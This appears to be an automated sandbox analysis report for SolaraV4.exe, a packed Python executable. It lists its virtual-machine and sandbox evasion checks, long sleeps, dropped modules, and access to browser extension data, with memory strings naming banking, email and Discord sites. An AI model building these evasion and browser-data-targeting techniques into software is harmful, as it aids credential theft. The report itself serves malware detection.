Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6843 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 603 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4945 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 390 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3823
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 746
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2751
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4510
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4436
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2510
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1759
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\python310.dll Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_socket.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_decimal.pyd Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.dll Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_hashlib.pyd Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\SolaraV4.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\SolaraV4.exe API coverage: 4.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980 Thread sleep count: 6843 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980 Thread sleep count: 603 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6356 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772 Thread sleep count: 4945 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060 Thread sleep count: 390 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5852 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964 Thread sleep count: 746 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\SIHClient.exe TID: 6520 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476 Thread sleep count: 4510 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476 Thread sleep count: 158 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep count: 4436 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4492 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep count: 233 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 Thread sleep count: 3447 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688 Thread sleep count: 459 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep count: 2510 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep count: 1759 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep time: -922337203685477s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 1_2_00007FF6FFC583C0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC59280 FindFirstFileExW,FindClose, 1_2_00007FF6FFC59280
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC71874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC59280 FindFirstFileExW,FindClose, 3_2_00007FF6FFC59280
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC71874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 3_2_00007FF6FFC583C0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72046EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 108_2_00007FF7C72046EC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72488E0 FindFirstFileExA, 108_2_00007FF7C72488E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 108_2_00007FF7C71FE21C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\ Jump to behavior
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxtrayZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696508427s
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696508427f
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: SIHClient.exe, 00000045.00000003.3048680197.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048283576.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2668582901.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000002.3052583503.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3050867328.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2672453963.00000270AE649000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWF6cC
